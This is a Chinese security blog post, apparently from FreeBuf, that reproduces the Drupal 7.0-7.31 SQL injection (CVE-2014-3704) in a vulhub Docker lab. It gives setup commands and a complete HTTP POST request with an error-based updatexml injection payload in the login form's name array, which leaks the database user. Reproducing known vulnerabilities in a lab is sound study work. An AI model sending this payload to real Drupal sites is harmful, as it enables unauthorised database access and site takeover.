freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

Drupal SQL注入漏洞(CVE-2014-3704)复现
2021-03-29 15:57:35

Drupal是使用PHP语言编写的开源内容管理框架(CMF),它由由内容管理系统和PHP开发框架共同构成,在GPL2.0及更新协议下发布。连续多年荣获全球最佳CMS大奖,是基于PHP语言最著名的WEB应用程序。

Drupal 是一款用量庞大的CMS,其7.0~7.31版本中存在一处无需认证的SQL漏洞。通过该漏洞,攻击者可以执行任意SQL语句,插入、修改管理员信息,甚至执行任意代码。

影响版本: 7.0~7.31

本文仅作漏洞复现记录与实现,利用流程如下:

一、漏洞环境

本环境采用vulhub搭建

执行以下指令完成环境搭建

cd drupal/CVE-2014-3704/

docker-compose up -d

启动完毕后会开启8080端口

漏洞链接:http://192.168.101.152:8080/

1617004012_606185ecec325f62df7ac.png!small

初次访问需要安装,采用默认安装即可,Mysql数据库名填写drupal,数据库用户名、密码为root,地址为mysql

1617004099_60618643f2c8af00e72d9.png!small

安装完成后,访问首页如下:

1617004215_606186b732401aa6312c1.png!small

二、漏洞利用

直接发送数据包

POST /?q=node&destination=node HTTP/1.1
Host: 192.168.101.152:8080
Content-Type: application/x-www-form-urlencoded
Content-Length: 120

pass=lol&form_build_id=&form_id=user_login_block&op=Log+in&name[0 or updatexml(0,concat(0xa,user()),0)%23]=bob&name[0]=a

即可触发漏洞,注意Content-Type要设置为application/x-www-form-urlencoded

1617004428_6061878cd47420c93e8a8.png!small

查询数据库

1617004456_606187a885fa793462917.png!small

到此结束

# web安全
本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者